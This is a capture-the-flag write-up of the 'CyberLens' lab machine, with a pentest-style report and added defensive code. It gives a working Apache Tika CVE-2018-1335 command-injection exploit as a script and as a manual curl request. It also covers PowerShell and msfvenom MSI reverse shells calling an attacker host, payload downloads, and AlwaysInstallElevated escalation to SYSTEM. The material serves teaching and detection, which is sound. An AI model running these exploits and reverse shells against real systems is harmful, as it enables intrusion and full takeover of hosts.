CyberLens
export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65417 closed tcp ports (reset), 101 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown
In http://cyberlens.thm/about.html we find "CyberLens Image Extractor", a metadata extractor. Checking the request with Burp Suite, we find the endpoint on port 61777, which is probably responsible for the metadata extraction.
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Going to http://cyberlens.thm:61777 we find "Apache Tika 1.17 Server". In Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server (CVE-2018-1335).
nc -lvnp 6666
git clone https://github.com/canumay/cve-2018-1335
cd cve-2018-1335
python3 exploit.py $TARGET_IP 61777 "powershell -e [BASE64_ENCODED_PAYLOAD]"
You can also do it manually:
curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e [BASE64_ENCODED_PAYLOAD]');"
Or using Metasploit, whatever.
I used PowerShell #3 (Base64) from https://www.revshells.com/.
So we are in.
whoami # cyberlens\cyberlens
Get-MpComputerStatus # Check if any protection, like antivirus or Windows Defender, is up and running.
Neither of the protection mechanisms is enabled or running.
Download PrivescCheck.ps1 (https://github.com/itm4n/PrivescCheck) from the attacker machine:
# On the attacker machine, inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80
# On the target (PowerShell):
curl http://10.2.17.44:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck
We see that AlwaysInstallElevated might be enabled. If AlwaysInstallElevated is enabled on a target, we can exploit it by crafting our own malicious MSI file that gets executed in the context of the local SYSTEM account. Once created, we can download and execute the malicious file on the victim as ANY user, and it will run under the context of the local SYSTEM account. This means that by placing malicious shell code in an MSI file, we are able to obtain a reverse shell as SYSTEM.
┌──────────────────────────────────────────────────────────────┐
│ CATEGORY │ TA0004 - Privilege Escalation                     │
│ NAME     │ AlwaysInstallElevated                             │
│ TYPE     │ Base                                              │
├──────────────────────────────────────────────────────────────┤
│ Check whether the 'AlwaysInstallElevated' policy is enabled  │
│ system-wide and for the current user. If so, the current     │
│ user may install a Windows Installer package with elevated   │
│ (SYSTEM) privileges.                                         │
└──────────────────────────────────────────────────────────────┘
LocalMachineKey   : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData  : 1
CurrentUserKey    : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
CurrentUserValue  : AlwaysInstallElevated
CurrentUserData   : 1
Description       : AlwaysInstallElevated is enabled in both HKLM and HKCU.
[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008
We craft a simple Windows reverse shell via msfvenom in the file format of an MSI.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.17.44 LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi
nc -lvnp 8888
python3 -m http.server 80
curl http://10.2.17.44:80/rev.msi -o rev.msi
.\rev.msi
whoami # nt authority\system
cd C:\Users\Administrator\Desktop
type admin.txt
Executive Summary
This report details the findings of a penetration test conducted against the target system "CyberLens." The assessment revealed a critical vulnerability (CVE-2018-1335) in Apache Tika, a component of the target's web application. This vulnerability allowed for remote code execution (RCE), leading to an initial foothold on the system. Further investigation revealed a privilege escalation vulnerability through the "AlwaysInstallElevated" Windows policy, ultimately granting SYSTEM-level access to the target machine.
Phase 1: Reconnaissance and Enumeration
1.1. Target Identification
The target IP address was identified as 10.10.195.124. To facilitate access, the /etc/hosts file on the attacking machine was modified to map the hostname cyberlens.thm to the target IP:
export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm
Explanation: The /etc/hosts file is used for local hostname resolution. This entry allows us to use the user-friendly name cyberlens.thm instead of the IP address throughout the penetration test.
1.2. Port Scanning
A comprehensive port scan was performed using nmap to identify open ports and running services:
nmap -p- --min-rate 5000 $TARGET_IP
Results:
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown
Phase 2: Vulnerability Analysis and Exploitation
2.1. Web Application Analysis
Browsing to http://cyberlens.thm revealed a website with an "About" page (http://cyberlens.thm/about.html) mentioning "CyberLens Image Extractor," a metadata extraction tool.
Using Burp Suite to intercept the HTTP requests, we observed a PUT request to /meta on port 61777 when interacting with the image extractor:
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Explanation: Burp Suite is a web application security testing tool that allows us to intercept, inspect, and modify HTTP traffic. This PUT request indicates that the metadata extraction functionality likely resides on the unusual port 61777.
2.2. Apache Tika Vulnerability (CVE-2018-1335)
Navigating to http://cyberlens.thm:61777 displayed "Apache Tika 1.17 Server." Research revealed that Apache Tika versions 1.7 to 1.17 are vulnerable to command injection (CVE-2018-1335).
Exploitation:
- Reverse Shell Setup: A netcat listener was started on the attacking machine to receive the reverse shell connection:
nc -lvnp 6666
- Exploit Execution: The cve-2018-1335 exploit from GitHub was used. This exploit leverages the vulnerability to execute arbitrary commands on the target system. The command executes a base64-encoded PowerShell reverse shell (PowerShell #3 (Base64) from https://www.revshells.com/).
git clone https://github.com/canumay/cve-2018-1335
cd cve-2018-1335
python3 exploit.py $TARGET_IP 61777 "powershell -e [BASE64_ENCODED_PAYLOAD]"
This establishes a reverse shell, giving the attacker command-line access to the target machine.
- Manual Exploitation (Alternative): The vulnerability can also be exploited manually using curl:
curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e [BASE64_ENCODED_PAYLOAD]');"
Explanation: This curl command sends a crafted HTTP PUT request with specific headers that exploit the Tika vulnerability:
  * X-Tika-OCRTesseractPath and X-Tika-OCRLanguage: These headers are manipulated to inject the command.
  * Content-type: This header should be image related, according to the vulnerability specification.
This is a manual demonstration of how the exploit works, bypassing the need for the Python script.
- Reverse Shell Payload Generation (Example): Websites like https://www.revshells.com/ can be used to generate various reverse shell payloads. The PowerShell #3 (Base64) option provides a convenient, encoded payload. It's crucial to use reliable sources and understand the payload you are using.
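The same header pattern is what a defender can key on. As an added example that is not part of the original writeup, of Apache Tika, or of the exploit repository, the following Python scans raw HTTP requests of the kind a reverse proxy or WAF in front of tika-server would see and flags a client-supplied X-Tika-OCRTesseractPath header or an X-Tika-OCRLanguage value that is not a plain Tesseract language code. The two requests it inspects are constructed samples; the rule names and the language-code pattern are my own assumptions.

```python
"""Flag tika-server requests that override the OCR command line via headers.

Added example for this writeup; not code from Apache Tika or the exploit repo.
Tika 1.7-1.17 honoured these client-supplied headers unchecked, which is the
basis of CVE-2018-1335. The sample requests below are constructed, not
captured from the CyberLens host.
"""
import re
from dataclasses import dataclass

# Header that lets a client choose the executable tika-server runs for OCR.
# A proxy in front of tika-server has no reason to forward it from clients.
PATH_OVERRIDE_HEADER = "x-tika-ocrtesseractpath"
LANGUAGE_HEADER = "x-tika-ocrlanguage"

# Legitimate Tesseract language values look like "eng", "eng+deu" or "chi_sim".
# Anything else (paths, switches such as //E:Jscript) is not a language code.
LANGUAGE_RE = re.compile(r"^[a-z]{3}(?:_[a-z]+)?(?:\+[a-z]{3}(?:_[a-z]+)?)*$")


@dataclass(frozen=True)
class Finding:
    rule: str
    header: str
    value: str


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers).

    Header names are lower-cased so lookups are case-insensitive, as HTTP
    requires. Only the head of the request is parsed; the body is ignored.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_headers(headers):
    """Return the findings for one request's headers (empty list = clean)."""
    findings = []
    if PATH_OVERRIDE_HEADER in headers:
        findings.append(Finding("ocr-path-override", PATH_OVERRIDE_HEADER,
                                headers[PATH_OVERRIDE_HEADER]))
    lang = headers.get(LANGUAGE_HEADER)
    if lang is not None and not LANGUAGE_RE.match(lang):
        findings.append(Finding("ocr-language-not-a-language-code",
                                LANGUAGE_HEADER, lang))
    return findings


def scan_requests(raw_requests):
    """Return [(request_line, findings)] for every request that has findings."""
    report = []
    for raw in raw_requests:
        method, path, headers = parse_request(raw)
        findings = inspect_headers(headers)
        if findings:
            report.append((f"{method} {path}", findings))
    return report


# Constructed sample traffic (not captured): one normal OCR request and one
# carrying the header pattern used against the CyberLens tika-server.
BENIGN_REQUEST = (
    "PUT /meta HTTP/1.1\r\n"
    "Host: cyberlens.thm:61777\r\n"
    "Content-Type: image/jpeg\r\n"
    "X-Tika-OCRLanguage: eng+deu\r\n"
    "\r\n"
    "<jpeg bytes>"
)

SUSPICIOUS_REQUEST = (
    "PUT /meta HTTP/1.1\r\n"
    "Host: cyberlens.thm:61777\r\n"
    "X-Tika-OCRTesseractPath: \"cscript\"\r\n"
    "X-Tika-OCRLanguage: //E:Jscript\r\n"
    "Content-Type: image/jp2\r\n"
    "\r\n"
    "var oShell = ...;"
)


if __name__ == "__main__":
    for request_line, findings in scan_requests([BENIGN_REQUEST, SUSPICIOUS_REQUEST]):
        for f in findings:
            print(f"{request_line}: {f.rule} ({f.header}={f.value!r})")
```

Beyond alerting, the same lookup belongs in an edge rule: tika-server should not accept X-Tika-OCR* overrides from external clients at all, so stripping those headers at the proxy removes this attack surface even before the upgrade to a fixed Tika release is rolled out.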
Phase 3: Privilege Escalation
3.1. Initial Foothold and System Enumeration
After successful exploitation, we gained a reverse shell as the cyberlens\cyberlens user:
whoami # Output: cyberlens\cyberlens
Initial system checks were performed:
Get-MpComputerStatus # Check Windows Defender status
Explanation: Get-MpComputerStatus checks the status of Windows Defender. This is important to understand the security posture of the system and anticipate potential obstacles. In this case, it was found to be disabled, simplifying the escalation process.
3.2. Automated Privilege Escalation Checks
The PrivescCheck.ps1 script was used to identify potential privilege escalation vectors. The script checks for a variety of common misconfigurations and vulnerabilities.
# On the attacker machine, inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80 # Host a simple HTTP server
# On the target (PowerShell):
curl http://[ATTACKER_IP]:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck # Load and run the script
Explanation:
  * curl ... -o ...: Downloads the script from the attacker's web server.
  * . .\PrivescCheck.ps1: The dot-sourcing operator (.) executes the script in the current scope, making its functions available.
  * Invoke-PrivescCheck: This is the main function of the script that performs the checks.
3.3. AlwaysInstallElevated Vulnerability
PrivescCheck.ps1 identified the AlwaysInstallElevated policy as being enabled:
┌──────────────────────────────────────────────────────────────┐
│ CATEGORY │ TA0004 - Privilege Escalation                     │
│ NAME     │ AlwaysInstallElevated                             │
│ TYPE     │ Base                                              │
├──────────────────────────────────────────────────────────────┤
│ Check whether the 'AlwaysInstallElevated' policy is enabled  │
│ system-wide and for the current user. If so, the current     │
│ user may install a Windows Installer package with elevated   │
│ (SYSTEM) privileges.                                         │
└──────────────────────────────────────────────────────────────┘
LocalMachineKey   : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData  : 1
CurrentUserKey    : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
CurrentUserValue  : AlwaysInstallElevated
CurrentUserData   : 1
Description       : AlwaysInstallElevated is enabled in both HKLM and HKCU.
[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008
Explanation: AlwaysInstallElevated is a Windows policy that, when enabled, allows any user to install MSI (Microsoft Installer) packages with SYSTEM-level privileges. This is a significant security risk because it bypasses normal user access controls. The registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer control this policy.
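One caveat worth keeping in mind when triaging this finding: Windows Installer only honours AlwaysInstallElevated when the value is set to 1 under both HKLM and HKCU, which is why PrivescCheck reports both hives before declaring the host vulnerable. The following Python, added here and not taken from PrivescCheck or from the writeup, encodes that decision for use in an audit script or a SIEM rule and, on Windows, reads the two values with winreg. The "Partial" status label and the read_policy_values helper are my own assumptions.

```python
"""Assess (and on Windows read) the AlwaysInstallElevated policy.

Added example for this writeup; not PrivescCheck code. The assessment is pure
Python so it can run over values collected from any host; the live registry
read uses winreg and therefore only works on Windows.
"""
import sys

POLICY_SUBKEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def assess(hklm_data, hkcu_data):
    """Return (status, description) for the two registry values.

    Each argument is the DWORD data under that hive, or None if the value (or
    the whole key) is absent. Windows Installer only applies the policy when
    both hives hold a non-zero value, so a single hive set to 1 is a
    misconfiguration worth fixing but does not by itself grant SYSTEM installs.
    """
    machine = bool(hklm_data)
    user = bool(hkcu_data)
    if machine and user:
        return "Vulnerable", "AlwaysInstallElevated is enabled in both HKLM and HKCU."
    if machine or user:
        hive = "HKLM" if machine else "HKCU"
        return "Partial", f"AlwaysInstallElevated is set only in {hive}; the policy is not in effect."
    return "Not vulnerable", "AlwaysInstallElevated is not enabled."


def read_policy_values():
    """Read both hives with winreg (Windows only). Returns (hklm, hkcu)."""
    if sys.platform != "win32":
        raise RuntimeError("registry access requires Windows")
    import winreg

    def read(hive):
        try:
            with winreg.OpenKey(hive, POLICY_SUBKEY) as key:
                data, kind = winreg.QueryValueEx(key, VALUE_NAME)
                # Only a REG_DWORD is meaningful for this policy.
                return data if kind == winreg.REG_DWORD else None
        except FileNotFoundError:
            # Missing key or value: the hive does not enable the policy.
            return None

    return read(winreg.HKEY_LOCAL_MACHINE), read(winreg.HKEY_CURRENT_USER)


if __name__ == "__main__":
    try:
        hklm, hkcu = read_policy_values()
    except RuntimeError as exc:
        # Off Windows, fall back to the values shown in the writeup's PrivescCheck output.
        print(f"{exc}; using the writeup's values (1, 1)")
        hklm, hkcu = 1, 1
    status, description = assess(hklm, hkcu)
    print(f"[*] Status: {status} - {description}")
```

To remediate, set both values to 0 (reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated /t REG_DWORD /d 0 /f, and the same for HKCU) or, preferably, disable "Always install with elevated privileges" under both Computer Configuration and User Configuration > Administrative Templates > Windows Components > Windows Installer in Group Policy, then re-run the assessment to confirm it reports "Not vulnerable".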
3.4. MSI-Based Privilege Escalation
- Crafting a Malicious MSI: msfvenom was used to create an MSI package containing a reverse shell payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi
Explanation:
  * -p windows/x64/shell_reverse_tcp: Specifies a 64-bit Windows reverse shell payload.
  * LHOST=[ATTACKER_IP]: Sets the attacker's IP address for the reverse shell connection.
  * LPORT=8888: Sets the port for the reverse shell connection.
  * -a x64: Specifies the architecture (64-bit).
  * --platform Windows: Specifies the target operating system.
  * -f msi: Specifies the output format as an MSI package.
  * -o rev.msi: Sets the output file name.
- Hosting the MSI: The attacker's machine hosted the malicious MSI file:
python3 -m http.server 80
- Downloading and Executing the MSI: The MSI was downloaded and executed on the target machine:
# Target machine
curl http://[ATTACKER_IP]:80/rev.msi -o rev.msi
.\rev.msi
- Receiving the SYSTEM Shell: A netcat listener was set up on the attacker's machine to receive the elevated reverse shell:
nc -lvnp 8888
- Verification: Once the connection was established, the whoami command confirmed SYSTEM-level access:
# On the listener (port 8888)
whoami # Output: nt authority\system
- Accessing Sensitive Data: With SYSTEM privileges, the administrator's files could be accessed:
cd C:\Users\Administrator\Desktop
type admin.txt
Recommendations
- Patch Apache Tika: Immediately update Apache Tika to a version that is not vulnerable to CVE-2018-1335 (version 1.18 or later).
- Disable AlwaysInstallElevated: Disable the "AlwaysInstallElevated" policy in both the HKLM and HKCU registry hives. This is a critical security best practice.
- Enable Windows Defender: Ensure that Windows Defender (or a suitable alternative antivirus/endpoint protection solution) is enabled and up-to-date.